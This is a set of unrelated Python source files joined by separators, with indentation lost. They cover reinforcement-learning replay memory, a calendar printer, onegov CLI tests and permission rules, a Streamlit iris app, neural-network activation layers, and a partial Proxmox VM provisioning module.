return len(self.memory)
def getHeldoutSet(self):
temp = self.selectMiniBatch()
return [t['state'] for t in temp]
def selectMiniBatch(self):
rcount = min(len(self.memory), params.mini_batch_size)
return random.sample(self.memory, rcount)
def storeExperience(self, exp):
if(len(self.memory) > params.size_of_experience):
self.memory.popleft()
self.memory.append(exp)
def experienceReplay(self, model, target_weights, update_policy):
sexperiences = self.selectMiniBatch()
X_val = []
Y_val = []
next_states = []
target_action_mask = np.zeros((len(sexperiences), model.output_size), dtype=int)
for index, exp in enumerate(sexperiences):
X_val.append(exp['state'])
target_action_mask[index][exp['action']] = 1
next_states.append(exp['next_state'])
nextStatesValues = update_policy.execute(model, next_states, target_weights)
for index, exp in enumerate(sexperiences):
if(exp['done']==True):
Y_val.append(exp['reward'])
else:
Y_val.append(exp['reward'] + nextStatesValues[index]*params.y)
X_val = np.array(X_val)
Y_val = np.array(Y_val)
summary, TDerror = model.executeStep(X_val, Y_val, target_action_mask)
return summary
|
#输入1970以来的一年及月份,从而打印日历的一个程序
def is_bissextile(year):
if year%400==0 or year%4==0 and year%100!=0:
return True
else:
return False
def days_of_month(year,month):
if month in [1,3,5,7,8,10,12]:
days=31
elif month in [4,6,9,11]:
days=30
else:
if is_bissextile(year):
days=29
else:
days=28
return days
def total_days(years):
sum_days=0
for year in range(1970,years):
if is_bissextile(year):
sum_days+=366
else:
sum_days+=365
return sum_days
def start_day(year,months):
sum_days=4+total_days(year)
for month in range(1,months):
sum_days+=days_of_month(year,month)
return sum_days%7
def print_week(year,month):
print("日\t一\t二\t三\t四\t五\t六")
i=start_day(year,month)
i-=1
j=1
while(i>=0):
print(end="\t")
i-=1
if(j>=7):
j-=7
print(end="\n")
j+=1
print("1",end="\t")
j+=1
for k in range(2,days_of_month(year,month)+1):
print(str(k),end="\t")
if(j>=7):
j-=7
print(end="\n")
j+=1
year=int(input("year(year>=1970):"))
month=int(input("month(1<=month<=12):"))
print("\t\t "+str(year)+"年"+str(month)+"月\n")
print_week(year,month)
|
import os
import yaml
from click.testing import CliRunner
from datetime import datetime
from onegov.chat import MessageCollection
from onegov.core.cli.commands import cli as core_cli
from onegov.event import Event, EventCollection
from onegov.org.cli import cli
from onegov.ticket import TicketCollection
from onegov.user import User
from transaction import commit
def test_manage_orgs(postgres_dsn, temporary_directory, redis_url):
cfg = {
'applications': [
{
'path': '/onegov_org/*',
'application': 'onegov.org.OrgApp',
'namespace': 'onegov_org',
'configuration': {
'dsn': postgres_dsn,
'depot_backend': 'depot.io.memory.MemoryFileStorage',
'redis_url': redis_url,
'websockets': {
'client_url': 'ws://localhost:8766',
'manage_url': 'ws://localhost:8766',
'manage_token': 'super-super-secret-token'
}
}
}
]
}
cfg_path = os.path.join(temporary_directory, 'onegov.yml')
with open(cfg_path, 'w') as f:
f.write(yaml.dump(cfg))
runner = CliRunner()
result = runner.invoke(cli, [
'--config', cfg_path, '--select', '/onegov_org/newyork',
'add', 'New York'
])
assert result.exit_code == 0
assert "New York was created successfully" in result.output
result = runner.invoke(cli, [
'--config', cfg_path, '--select', '/onegov_org/newyork',
'add', 'New York'
])
assert result.exit_code == 1
assert "may not reference an existing path" in result.output
result = runner.invoke(core_cli, [
'--config', cfg_path, '--select', '/onegov_org/newyork', 'delete'
], input='y\n')
assert result.exit_code == 0
assert "Instance was deleted successfully" in result.output
def test_fetch_with_state_and_tickets(
cfg_path, session_manager, test_password):
runner = CliRunner()
local = 'baz'
remote = 'bar'
session_manager.ensure_schema_exists('foo-baz')
session_manager.ensure_schema_exists('foo-bar')
def events(entity=local):
return get_session(entity).query(Event)
def get_session(entity):
session_manager.set_current_schema(f'foo-{entity}')
return session_manager.session()
for entity, title, source, tags, location in (
(remote, '1', None, [], ''),
(remote, '2', None, [], None),
):
EventCollection(get_session(entity)).add(
title=title,
start=datetime(2015, 6, 16, 9, 30),
end=datetime(2015, 6, 16, 18, 00),
timezone='Europe/Zurich',
tags=tags,
location=location,
source=source,
organizer_email='triceracops@newyork.com',
organizer_phone='079 123 45 67',
)
commit()
get_session(local).add(User(
username='admin@example.org',
password_hash=test_password,
role='admin'
))
commit()
# test published_only, import none
result = runner.invoke(cli, [
'--config', cfg_path,
'--select', f'/foo/{local}',
'fetch',
'--source', remote,
'--create-tickets',
'--published-only'
])
assert result.exit_code == 0
assert "0 added, 0 updated, 0 deleted" in result.output
# Import initiated events
result = runner.invoke(cli, [
'--config', cfg_path,
'--select', f'/foo/{local}',
'fetch',
'--source', remote,
'--create-tickets',
])
assert result.exit_code == 0
assert "2 added, 0 updated, 0 deleted" in result.output
local_event = events().filter_by(title='1').first()
assert local_event.state == 'submitted'
assert local_event.organizer_email == 'triceracops@newyork.com'
assert local_event.organizer_phone == '079 123 45 67'
assert TicketCollection(get_session(local)).query().count() == 2
assert MessageCollection(get_session(local)).query().count() == 2
assert TicketCollection(get_session(local)).query().first().muted is True
collection = TicketCollection(get_session(local))
ticket = collection.by_handler_id(local_event.id.hex)
assert ticket.title == local_event.title
assert ticket.handler.event == local_event
assert ticket.handler.source == 'fetch-bar-1'
assert ticket.handler.import_user == 'admin@example.org'
assert ticket.state == 'open'
# Chance the state of one ticket
remote_event = events(remote).filter_by(title='1').first()
remote_event.submit()
remote_event.publish()
commit()
# Test not updating anything,
result = runner.invoke(cli, [
'--config', cfg_path,
'--select', '/foo/baz',
'fetch',
'--source', remote,
'--create-tickets',
'--state-transfers', 'published:withdrawn'
])
assert result.exit_code == 0
assert "0 added, 0 updated, 0 deleted" in result.output
# Withdraw event when ticket is still open and state is initiated
remote_event = events(remote).filter_by(title='1').first()
remote_event.withdraw()
commit()
assert remote_event.state == 'withdrawn'
result = runner.invoke(cli, [
'--config', cfg_path,
'--select', '/foo/baz',
'fetch',
'--source', remote,
'--create-tickets',
'--state-transfers', 'initiated:withdrawn',
'--state-transfers', 'submitted:withdrawn'
])
assert result.exit_code == 0
assert "0 added, 1 updated, 0 deleted" in result.output
local_event = events(local).filter_by(title='1').first()
assert local_event.state == 'withdrawn'
collection = TicketCollection(get_session(local))
ticket = collection.by_handler_id(local_event.id.hex)
# do not touch tickets when updating state
assert ticket.state == 'open'
# Change state of remaining to published
# Change the state of one ticket
remote_event = events(remote).filter_by(title='2').first()
remote_event.submit()
remote_event.publish()
commit()
# Update local state from submitted to published
result = runner.invoke(cli, [
'--config', cfg_path,
'--select', '/foo/baz',
'fetch',
'--source', remote,
'--create-tickets',
'--state-transfers', 'submitted:published'
])
assert result.exit_code == 0
assert "0 added, 1 updated, 0 deleted" in result.output
event = events(local).filter_by(title='2').first()
assert event.state == 'published'
# Delete the original event
remote_event = events(remote).filter_by(title='2').first()
get_session(remote).delete(remote_event)
commit()
result = runner.invoke(cli, [
'--config', cfg_path,
'--select', '/foo/baz',
'fetch',
'--source', remote,
'--create-tickets',
'--delete-orphaned-tickets'
])
assert result.exit_code == 0
assert "0 added, 0 updated, 1 deleted" in result.output
assert TicketCollection(get_session(local)).query().count() == 1
assert MessageCollection(get_session(local)).query().count() == 1
# Check closing local tickets when first event is deleted
remote_event = events(remote).filter_by(title='1').first()
get_session(remote).delete(remote_event)
commit()
result = runner.invoke(cli, [
'--config', cfg_path,
'--select', '/foo/baz',
'fetch',
'--source', remote,
])
assert result.exit_code == 0
assert "0 added, 0 updated, 1 deleted" in result.output
ticket = TicketCollection(get_session(local)).query().one()
# for open tickets creates two ticket messages closed and opne
messages = MessageCollection(get_session(local)).query().all()
assert all(m.owner == 'admin@example.org' for m in messages)
def test_fetch(cfg_path, session_manager, test_password):
runner = CliRunner()
session_manager.ensure_schema_exists('foo-baz')
session_manager.ensure_schema_exists('foo-qux')
def get_session(entity):
session_manager.set_current_schema(f'foo-{entity}')
return session_manager.session()
for entity, title, source, tags, location in (
('bar', '1', None, [], ''),
('bar', '2', None, ['A'], None),
('bar', '3', None, ['A', 'B'], 'bar'),
('bar', '4', None, ['A', 'C'], '1234 Bar'),
('bar', '5', None, ['C'], 'there in 4321 baz!'),
('bar', '6', 'xxx', [], 'bar'),
('bar', '7', 'yyy', ['A', 'B'], None),
('baz', 'a', None, [], 'BAZ'),
('baz', 'b', None, ['A', 'C'], '4321 Baz'),
('baz', 'c', 'zzz', ['B', 'C'], 'bar'),
):
EventCollection(get_session(entity)).add(
title=title,
start=datetime(2015, 6, 16, 9, 30),
end=datetime(2015, 6, 16, 18, 00),
timezone='Europe/Zurich',
tags=tags,
location=location,
source=source
)
commit()
for entity in ('bar', 'baz', 'qux'):
get_session(entity).add(User(
username='admin@example.org',
password_hash=test_password,
role='admin'
))
commit()
assert get_session('bar').query(Event).count() == 7
assert get_session('baz').query(Event).count() == 3
assert get_session('qux').query(Event).count() == 0
assert get_session('bar').query(Event).first().state == 'initiated'
# No sources provided
result = runner.invoke(cli, [
'--config', cfg_path,
'--select', '/foo/qux',
'fetch',
])
assert result.exit_code != 0
assert "Provide at least one source" in result.output
# Bar[*] -> Qux
result = runner.invoke(cli, [
'--config', cfg_path,
'--select', '/foo/qux',
'fetch',
'--source', 'bar'
])
assert result.exit_code == 0
assert "5 added, 0 updated, 0 deleted" in result.output
assert get_session('qux').query(Event).first().state == 'published'
# Bar[B, C] -> Qux
result = runner.invoke(cli, [
'--config', cfg_path,
'--select', '/foo/qux',
'fetch',
'--source', 'bar',
'--tag', 'A',
'--tag', 'B'
])
assert result.exit_code == 0
assert "0 added, 0 updated, 2 deleted" in result.output
# Bar[C], Baz[C] -> Qux
result = runner.invoke(cli, [
'--config', cfg_path,
'--select', '/foo/qux',
'fetch',
'--source', 'bar',
'--source', 'baz',
'--tag', 'C',
])
assert result.exit_code == 0
assert "2 added, 0 updated, 2 deleted" in result.output
# Baz['bar'] qux['bar'] -> Bar
result = runner.invoke(cli, [
'--config', cfg_path,
'--select', '/foo/bar',
'fetch',
'--source', 'baz',
'--source', 'qux',
'--location', 'bar',
])
assert result.exit_code == 0
assert "0 added, 0 updated, 0 deleted" in result.output
# Bar['baz'] -> Baz
result = runner.invoke(cli, [
'--config', cfg_path,
'--select', '/foo/baz',
'fetch',
'--source', 'qux',
'--source', 'bar',
'--location', 'baz',
])
assert result.exit_code == 0
assert "1 added, 0 updated, 0 deleted" in result.output
|
import streamlit as st
import plotly.express as px
import numpy as np
import pickle
import load_data
import time
# make a timer on the page
# with st.spinner(text='In progress'):
# time.sleep(5)
# st.success('Done')
# input images / video -- link to the file you want
# could upload file to the specific df
file = st.file_uploader('File uploader')
# have user pick a color
st.color_picker('Pick a color')
# name of the app we want to appear on the top of the screen
st.title("My Awesome Flower Predictor")
st.header("We predict Iris types")
st.subheader("No joke")
# get input from user about Iris and predict what type/species it is
# load data
df_iris = load_data.load_iris()
# make plots on the page
st.plotly_chart(px.scatter(df_iris, 'sepal_width', 'sepal_length'))
# make it an option to show only if the user wants to
# question prompt for checkbox -- save result as boolean
show_df = st.checkbox("Do you want to see the data?")
if show_df: # if True
df_iris
# make interactive -- get user input so we can make a prediction
# must manually list the questions in the RIGHT ORDER as the df table
# sepal length
s_l = st.number_input('Input the Sepal Length')
# sepal width
s_w = st.number_input('Input the Sepal Width')
# petal length
p_l = st.number_input('Input the Petal Length')
# petal width
p_w = st.number_input('Input the Petal Width')
# we need a df or np array to feed into
user_values = np.array([s_l, s_w, p_l, p_w])
# load model -- make sure the model made was saved in the same env
# rb -- read binary
# wb -- write binary
with open('saved-iris-model-2.pkl', 'rb') as f:
model = pickle.load(f)
# make prediction
# .predict, since our model is just a regular Logistic Regression
with st.echo():
# st.echo() will output the actual code -- could have a checkbox for people to see the code if they want
prediction = model.predict(user_values.reshape(1, -1))
# need to have variables by itself for itto display in the web app
prediction
# make our predictions look nicer for the user -- [0]
st.header(f'The model predicts: {prediction[0]}')
# easter egg
# st.balloons()
# make vertical columns (optional)
st.beta_container()
col1, col2, col3 = st.beta_columns(3)
# col1.subheader('Columnisation')
# col2.subheader('Columnisation')
# col3.subheader('Columnisation')
# can do the above OR context blocks like below
with col1:
'I am printing things'
with col2:
df_iris
with col3:
st.subheader("cool stuff") |
import fullname
import unittest
class TestFullname(unittest.TestCase):
#Tests that invalid input (containing non-alphabetical characters, spaces, etc) raises a TypeValue error. Should return true
def test_fullname_input(self):
self.assertRaises(TypeError, fullname.fullname, 'first124', 'last ')
#Tests that the input of the function is a string. Should return true. Python error checking handles this along with code inside
def test_fullname_input_type(self):
self.assertRaises(TypeError, fullname.fullname, 3, "name")
#Ensures a warning is raised to alert the user that an empty string was passed in
def test_fullname_empty_string(self):
self.assertRaises(Warning, fullname.fullname, "", "last")
#Tests for general correctness of the function. Should return true
def test_fullname_correct(self):
self.assertTrue(fullname.fullname("John", "Smith"), "John Smith")
if __name__ == "__main__":
unittest.main() |
import os, requests, zipfile
download_url = 'https://storage.googleapis.com/download.tensorflow.org/models/inception5h.zip'
model_file = 'tensorflow_inception_graph.pb'
def download_model(data_dir):
download_path = get_zip_file_name(data_dir)
response = requests.get(download_url)
with open(download_path, 'wb') as f:
f.write(response.content)
with zipfile.ZipFile(download_path, 'r') as zip_ref:
zip_ref.extractall(data_dir)
return get_model_file_name(data_dir)
def get_model_file_name(data_dir):
return os.path.join(data_dir, model_file)
def get_zip_file_name(data_dir):
base = os.path.basename(download_url)
download_path = os.path.join(data_dir, base)
return download_path
def download_model_if_not_exists(data_dir):
zip_file_path = get_zip_file_name(data_dir)
if not os.path.isfile(zip_file_path):
if not os.path.isdir(data_dir):
os.makedirs(data_dir)
return download_model(data_dir)
return get_model_file_name(data_dir) |
from django.shortcuts import render
from django.contrib.auth.decorators import login_required
from notification.models import Notification
from twitter_user.models import Profile
@login_required
def notifications_view(request, handle):
html = 'notification.html'
notifcation_count = Notification.objects.filter(user=request.user).count()
tweets = Notification.objects.filter(
user=Profile.objects.get(handle=handle))
for x in tweets:
x.delete()
return render(
request,
html,
{'tweets': tweets, 'notifcation_count': notifcation_count}
)
|
# -*- coding: utf-8 -*-
import numpy as np
from torch import Tensor
from framework.modules import Module
class ReLU(Module):
"""Implements the Rectified Linear Unit activation layer"""
def forward(self, x):
"""Carries out the forward pass for backpropagation.
INPUT
x: input
OUTPUT
x after applying ReLU
"""
# Clamp to 0
self.x = x
return self.x.clamp(min=0)
def backward(self, grad):
"""
Carries out the backward pass for backpropagation.
INPUT:
grad: gradient of the previous layer
OUTPUT:
grad after derivative of ReLU
"""
# Derivative
return grad * Tensor(np.where(self.x <= 0, 0, 1)).view(grad.size())
class LeakyReLU(Module):
"""Implements the Leaky ReLU activation layer"""
def __init__(self, a=.001):
self.a = a
def forward(self, x):
"""Carries out the forward pass for backpropagation.
INPUT
x: input
OUTPUT
x after applying LeakyReLU
"""
self.x = x
# Apply activation
return Tensor(np.where(x >= 0, x, self.a * x ))
def backward(self, grad):
"""Carries out the backward pass for backpropagation.
INPUT:
grad: gradient of the previous layer
OUTPUT:
grad after derivative of LeakyReLU
"""
# Derivative
return grad * Tensor(np.where(self.x >= 0,
1, self.a)).view(grad.size())
class Tanh(Module):
"""Implements the Tanh activation layer"""
def forward(self, x):
"""Carries out the forward pass for backpropagation.
INPUT
x: input
OUTPUT
x after applying Tanh
"""
# Apply activation
self.x_tanh = x.tanh()
return self.x_tanh
def backward(self, grad):
"""Carries out the backward pass for backpropagation.
INPUT:
grad: gradient of the previous layer
OUTPUT:
grad after derivative of Tanh
"""
# Derivative
return grad * (1 - self.x_tanh ** 2).view(grad.size())
class Sigmoid(Module):
"""Implements the Sigmoid activation layer"""
def forward(self, x):
"""Carries out the forward pass for backpropagation.
INPUT
x: input
OUTPUT
x after derivative of Sigmoid
"""
# Apply activation
self.sigmoid = (1 + (x / 2).tanh()) / 2 #With tanh to avoid overflow
return self.sigmoid
def backward(self, grad):
"""Carries out the backward pass for backpropagation.
INPUT:
grad: gradient of the previous layer
OUTPUT:
grad after applying Sigmoid
"""
# Derivative
out = grad * (self.sigmoid * (1 - self.sigmoid)).view(grad.size())
return out
|
__author__="Sara Farazi"
# Defines a cell on the map with its four corner points
class Point:
def __init__(self, x, y):
self.x = x
self.y = y
class Coordinates:
def __init__(self, upper_right, upper_left, lower_right, lower_left):
self.upper_right = upper_right
self.upper_left = upper_left
self.lower_right = lower_right
self.lower_left = lower_left
class Cell:
def __init__(self, id, coordinates):
self.id = id
self.coordinates = coordinates
def is_in_cell(self, point):
if point.y > self.lower_left.y and point.y < self.upper_left.y:
if point.x > self.upper_left.x and point.x < self.upper_right.x:
return True
return False
|
import sedate
from datetime import datetime, timedelta
from onegov.core.security import Public
from onegov.core.security.permissions import Intent
from onegov.user import User
from onegov.user import UserCollection
from onegov.wtfs import WtfsApp
from onegov.wtfs.collections import ScanJobCollection
from onegov.wtfs.models import DailyList
from onegov.wtfs.models import DailyListBoxes
from onegov.wtfs.models import Municipality
from onegov.wtfs.models import Notification
from onegov.wtfs.models import ScanJob
from onegov.wtfs.models import UserManual
from typing import TYPE_CHECKING
if TYPE_CHECKING:
from morepath import Identity
class AddModel(Intent):
""" The permission to add a given model. """
class AddModelUnrestricted(Intent):
""" The permission to add given model without any restrictions. """
class EditModel(Intent):
""" The permission to edit a given model. """
class EditModelUnrestricted(Intent):
""" The permission to edit a given model without any restrictions. """
class DeleteModel(Intent):
""" The permission to delete a given model. """
class ViewModel(Intent):
""" The permission to view a given model. """
class ViewModelUnrestricted(Intent):
""" The permission to view a given model without any restrictions. """
def same_group(model: object, identity: 'Identity') -> bool:
""" Returns True, if the given model is in the same user group/municipality
as the given identy.
"""
if hasattr(model, 'group_id'):
if model.group_id and identity.groupid:
return model.group_id.hex == identity.groupid
elif hasattr(model, 'municipality_id'):
if model.municipality_id and identity.groupid:
return model.municipality_id.hex == identity.groupid
return False
@WtfsApp.setting_section(section="roles")
def get_roles_setting() -> dict[str, set[type[Intent]]]:
return {
'admin': {
AddModel,
AddModelUnrestricted,
EditModel,
EditModelUnrestricted,
DeleteModel,
ViewModel,
ViewModelUnrestricted,
Public,
},
'editor': {
Public,
},
'member': {
Public,
},
'anonymous': {
Public,
},
}
@WtfsApp.permission_rule(model=Municipality, permission=object)
def has_permission_municipality(
app: WtfsApp,
identity: 'Identity',
model: Municipality,
permission: object
) -> bool:
# Municipalities with data and/or users cannot not be deleted
if permission in {DeleteModel}:
if model.users.first():
return False
if model.has_data:
return False
return permission in getattr(app.settings.roles, identity.role)
@WtfsApp.permission_rule(model=UserCollection, permission=object)
def has_permission_users(
app: WtfsApp,
identity: 'Identity',
model: UserCollection,
permission: object
) -> bool:
# Editors may view and add users
if identity.role == 'editor':
if permission in {ViewModel, AddModel}:
return True
return permission in getattr(app.settings.roles, identity.role)
@WtfsApp.permission_rule(model=User, permission=object)
def has_permission_user(
app: WtfsApp,
identity: 'Identity',
model: User,
permission: object
) -> bool:
# One may not delete himself
if model.username == identity.userid:
if permission in {DeleteModel}:
return False
# Editors may view, edit and delete members within the same group or
# view and edit themselves
if identity.role == 'editor':
if permission in {ViewModel, EditModel, DeleteModel}:
if model.role == 'member':
if same_group(model, identity):
return True
if permission in {ViewModel, EditModel}:
if model.username == identity.userid:
return True
return permission in getattr(app.settings.roles, identity.role)
@WtfsApp.permission_rule(model=ScanJobCollection, permission=object)
def has_permission_scan_jobs(
app: WtfsApp,
identity: 'Identity',
model: ScanJobCollection,
permission: object
) -> bool:
# Editors and members of groups may view and add scan jobs
if identity.role in ('editor', 'member'):
if identity.groupid:
if permission in {ViewModel, AddModel}:
return True
return permission in getattr(app.settings.roles, identity.role)
@WtfsApp.permission_rule(model=ScanJob, permission=object)
def has_permission_scan_job(
app: WtfsApp,
identity: 'Identity',
model: ScanJob,
permission: object
) -> bool:
# Editors and members of groups may view and edit scan jobs within
# the same group
if identity.role in ('editor', 'member'):
if identity.groupid:
if permission in {ViewModel, EditModel}:
if same_group(model, identity):
return True
if permission is DeleteModel and identity.role == 'editor':
if same_group(model, identity):
dt = model.dispatch_date
# editors of the same group may delete scan jobs up until
# 17:00 on the day before the dispatch
horizon = datetime(dt.year, dt.month, dt.day, 17)
horizon -= timedelta(days=1)
horizon = sedate.replace_timezone(horizon, 'Europe/Zurich')
now = sedate.utcnow()
return now <= horizon
return permission in getattr(app.settings.roles, identity.role)
@WtfsApp.permission_rule(model=DailyList, permission=object)
def has_permission_daily_list(
app: WtfsApp,
identity: 'Identity',
model: DailyList,
permission: object
) -> bool:
# Members without groups (transport company) may view the daily list
# selection form
if identity.role == 'member':
if not identity.groupid:
if permission in {ViewModel}:
return True
return permission in getattr(app.settings.roles, identity.role)
@WtfsApp.permission_rule(model=DailyListBoxes, permission=object)
def has_permission_daily_list_boxes(
app: WtfsApp,
identity: 'Identity',
model: DailyListBoxes,
permission: object
) -> bool:
# Members without groups (transport company) may view the daily list boxes
if identity.role == 'member':
if not identity.groupid:
if permission in {ViewModel}:
return True
return permission in getattr(app.settings.roles, identity.role)
@WtfsApp.permission_rule(model=Notification, permission=object)
def has_permission_notification(
app: WtfsApp,
identity: 'Identity',
model: Notification,
permission: object
) -> bool:
# Everybody may view notifications
if permission in {ViewModel}:
return True
return permission in getattr(app.settings.roles, identity.role)
@WtfsApp.permission_rule(model=UserManual, permission=object)
def has_permission_user_manual(
app: WtfsApp,
identity: 'Identity',
model: UserManual,
permission: object
) -> bool:
# Everybody may view the user manual
if permission in {ViewModel}:
return True
return permission in getattr(app.settings.roles, identity.role)
|
import logging
import time
import re
from proxmoxer import ProxmoxAPI
from subcontractor.credentials import getCredentials
# https://pve.proxmox.com/pve-docs/api-viewer/
POLL_INTERVAL = 4
BOOT_ORDER_MAP = { 'hdd': 'c', 'net': 'n', 'cd': 'd' }
vlaned_network = re.compile( r'^[a-zA-Z0-9][a-zA-Z0-9_\-]*\.[0-9]{1,4}$' )
def _connect( connection_paramaters ):
creds = connection_paramaters[ 'credentials' ]
if isinstance( creds, str ):
creds = getCredentials( creds )
logging.debug( 'proxmox: connecting to "{0}" with user "{1}"'.format( connection_paramaters[ 'host' ], creds[ 'username' ] ) )
return ProxmoxAPI( connection_paramaters[ 'host' ], user=creds[ 'username' ], password=creds[ 'password' ], verify_ssl=False ) # TODO: flag to toggle verify_ssl
def _disconnect( proxmox ):
pass
# proxmox.release_ticket() # TODO: what do we do to logout?, have to add the try/finally everywhere _disconnect is called
def _taskWait( node, taskid ):
while True:
status = node.tasks( taskid ).status.get()
if status[ 'status' ] != 'running':
return status[ 'exitstatus' ]
logging.debug( 'proxmox: Waiting ...' )
time.sleep( POLL_INTERVAL )
def _get_vm( proxmox, vmid ):
vmid = str( vmid )
for node in proxmox.nodes.get():
node = proxmox.nodes( node[ 'node' ] )
for vm in node.qemu.get():
if vm[ 'vmid' ] == vmid:
return node, node.qemu( vmid )
return None, None
def create( paramaters ):
connection_paramaters = paramaters[ 'connection' ]
vm_paramaters = paramaters[ 'vm' ]
vm_vmid = vm_paramaters[ 'vmid' ]
vm_name = vm_paramaters[ 'name' ]
logging.info( 'proxmox: creating vm "{0}"'.format( vm_name ) )
proxmox = _connect( connection_paramaters )
node = proxmox.nodes( vm_paramaters[ 'node' ] )
network_list = []
for network in node.network.get():
if 'bridge' in network[ 'type' ].lower():
network_list.append( network[ 'iface' ] )
# TODO: let harddrive creation be raw or qcow2
# TODO: need network boot order, or just the provisioning interface
for interface in vm_paramaters[ 'interface_list' ]:
network_name = interface[ 'network' ]
if vlaned_network.match( network_name ):
network_name, _ = network_name.split( '.' )
if network_name not in network_list:
raise ValueError( 'Network "{0}" not aviable on node "{1}"'.format( network_name, vm_paramaters[ 'node' ] ) )
spec = {
'vmid': vm_vmid,
'name': vm_name,
'ostype': vm_paramaters.get( 'ostype', 'l26' ),
'memory': vm_paramaters.get( 'memory_size', 512 ), # in MB
'sockets': vm_paramaters.get( 'sockets', 1 ),
'numa': vm_paramaters.get( 'numa', 0 ),
'cores': vm_paramaters.get( 'core_count', 1 ),
'boot': ''.join( BOOT_ORDER_MAP[i] for i in vm_paramaters.get( 'boot_order', 'nc' ) ),
'scsihw': 'virtio-scsi-pci',
'bootdisk': 'scsi0'
}
interface_list = vm_paramaters[ 'interface_list' ]
interface_list.sort( key=lambda a: a[ 'physical_location' ] )
for index in range( 0, len( interface_list ) ):
interface = interface_list[ index ]
network_name = interface[ 'network' ]
vlan = ''
if vlaned_network.match( network_name ):
network_name, vlan = network_name.split( '.' )
vlan = ',tag={0}'.format( vlan )
spec[ 'net{0}'.format( index ) ] = '{0},bridge={1},firewall=0{2}'.format( interface.get( 'type', 'virtio' ), network_name, vlan )
disk_list = vm_paramaters[ 'disk_list' ]
disk_list.sort( key=lambda a: a[ 'name' ] )
for index in range( 0, len( disk_list ) ):
disk = disk_list[ index ]
location = 'local'
# location = 'local-lvm'
# if disk[ 'type' ] == 'thin':
# location = 'local-lvmthin'
# spec[ 'scsi{0}'.format( index ) ] = '{0}:vm-{1}-{2},size={3}G'.format( location, vm_vmid, disk[ 'name' ], disk.get( 'size', 10 ) ) # if we pre-created the file, make sure delete removes disks if they are manually created
# file name for generating our selves: Block: vm-<vm id>-<disk name> Ffilesystem: <vmid>/vm-<vm id>-<disk name>
spec[ 'scsi{0}'.format( index ) ] = '{0}:{1}'.format( location, disk.get( 'size', 10 ) ) # in GiB
# have yet to find the log file for the "{data:null}" results, I have found that using `qm create` on the command line helps expose the error, https://pve.proxmox.com/pve-docs/qm.1.html
taskid = node.qemu.create( **spec )
if _taskWait( node, taskid ) != 'OK':
raise Exception( 'Create task failed' )
return { 'complete': True }
def destroy( paramaters ):
connection_paramaters = paramaters[ 'connection' ]
vm_vmid = paramaters[ 'vmid' ]
vm_name = paramaters[ 'name' ]
logging.info( 'proxmox: destroying vm "{0}"({1})'.format( vm_name, vm_vmid ) )
proxmox = _connect( connection_paramaters )
node, vm = _get_vm( proxmox, vm_vmid )
if vm is None:
return { 'done': True } # it's gone, we are donne
taskid = vm.delete()
if _taskWait( node, taskid ) != 'OK':
raise Exception( 'Delete task failed' )
logging.info( 'proxmox: vm "{0}" destroyed'.format( vm_name ) )
return { 'done': True }
def get_interface_map( paramaters ):
connection_paramaters = paramaters[ 'connection' ]
vm_vmid = paramaters[ 'vmid' ]
vm_name = paramaters[ 'name' ]
interface_list = []
logging.info( 'proxmox: getting interface map "{0}"({1})'.format( vm_name, vm_vmid ) )
proxmox = _connect( connection_paramaters )
_, vm = _get_vm( proxmox, vm_vmid )
if vm is None:
raise Exception( 'VM Not Found' )
config_map = vm.config.get()
interface_map = {}
for name, value in config_map.items():
if name.startswith( 'net' ):
lines = value.split( ',' )
( _, mac ) = lines[0].split( '=' ) # 'net0': 'virtio=A6:EF:6D:0F:F3:7F,bridge=vmbr0,firewall=1',
interface_map[ name ] = mac
for name in sorted( interface_map.keys() ):
interface_list.append( interface_map[ name ] )
return { 'interface_list': interface_list }
def _power_state_convert( state ):
if state == 'stopped':
return 'off'
elif state == 'running':
return 'on'
else:
return 'unknown "{0}"'.format( state )
def set_power( paramaters ):
connection_paramaters = paramaters[ 'connection' ]
vm_vmid = paramaters[ 'vmid' ]
vm_name = paramaters[ 'name' ]
desired_state = paramaters[ 'state' ]
logging.info( 'proxmox: setting power state of "{0}"({1}) to "{2}"...'.format( vm_name, vm_vmid, desired_state ) )
proxmox = _connect( connection_paramaters )
node, vm = _get_vm( proxmox, vm_vmid )
if vm is None:
raise Exception( 'VM Not Found' )
status = vm.status.current.get()
curent_state = _power_state_convert( status[ 'status' ] )
if curent_state == desired_state or ( curent_state == 'off' and desired_state == 'soft_off' ):
return { 'state': curent_state }
taskid = None
if desired_state == 'on':
taskid = vm.status.start.post()
elif desired_state == 'off':
taskid = vm.status.stop.post()
elif desired_state == 'soft_off':
taskid = vm.status.shutdown.post()
else:
raise Exception( 'proxmox desired state "{0}"'.format( desired_state ) )
rc = _taskWait( node, taskid )
if rc not in ( 'OK', 'VM quit/powerdown failed - got timeout' ):
logging.debug( 'proxmox: unexpected power control return "{0}"'.format( rc ) )
raise Exception( 'Power task failed' )
status = vm.status.current.get()
logging.info( 'proxmox: setting power state of "{0}"({1}) to "{2}" complete'.format( vm_name, vm_vmid, desired_state ) )
return { 'state': _power_state_convert( ( status[ 'status' ] ) ) }
def power_state( paramaters ):
connection_paramaters = paramaters[ 'connection' ]
vm_vmid = paramaters[ 'vmid' ]
vm_name = paramaters[ 'name' ]
logging.info( 'proxmox: getting "{0}"({1}) power state...'.format( vm_name, vm_vmid ) )
proxmox = _connect( connection_paramaters )
_, vm = _get_vm( proxmox, vm_vmid )
if vm is None:
raise Exception( 'VM Not Found' )
status = vm.status.current.get()
return { 'state': _power_state_convert( status[ 'status' ] ) }
def node_list( paramaters ):
# returns a list of hosts in a resource
# host must have paramater[ 'min_memory' ] aviable in MB and at least paramaters[ 'min_cores' ] cpu cores, then
# each metric is converted to a value 0 -> 1, where 1 is most desired, the * the scaler then summed up, then we
# sort by the score and return the list
connection_paramaters = paramaters[ 'connection' ]
logging.info( 'proxmox: getting Node List' )
proxmox = _connect( connection_paramaters )
node_map = {}
for node in proxmox.nodes.get():
if node[ 'status' ] != 'online':
logging.debug( 'proxmox: node "{0}", not online, status: "{1}"'.format( node[ 'node' ], node[ 'status' ] ) )
continue
status = proxmox.nodes( node[ 'node' ] ).status.get()
vm_count = len( proxmox.nodes( node[ 'node' ] ).qemu.get() )
total_memory = status[ 'memory' ][ 'total' ] / 1024.0 / 1024.0
memory_aviable = status[ 'memory' ][ 'free' ] / 1024.0 / 1024.0
if memory_aviable < paramaters[ 'min_memory' ]:
logging.debug( 'proxmox: host "{0}", low aviable ram: "{1}"'.format( node[ 'node' ], memory_aviable ) )
continue
cpu_utilization_aviable = 1.0 - min( 1.0, status[ 'cpu' ] )
cpu_aviable = cpu_utilization_aviable * status[ 'cpuinfo' ][ 'cpus' ]
if cpu_aviable < paramaters[ 'min_cores' ]:
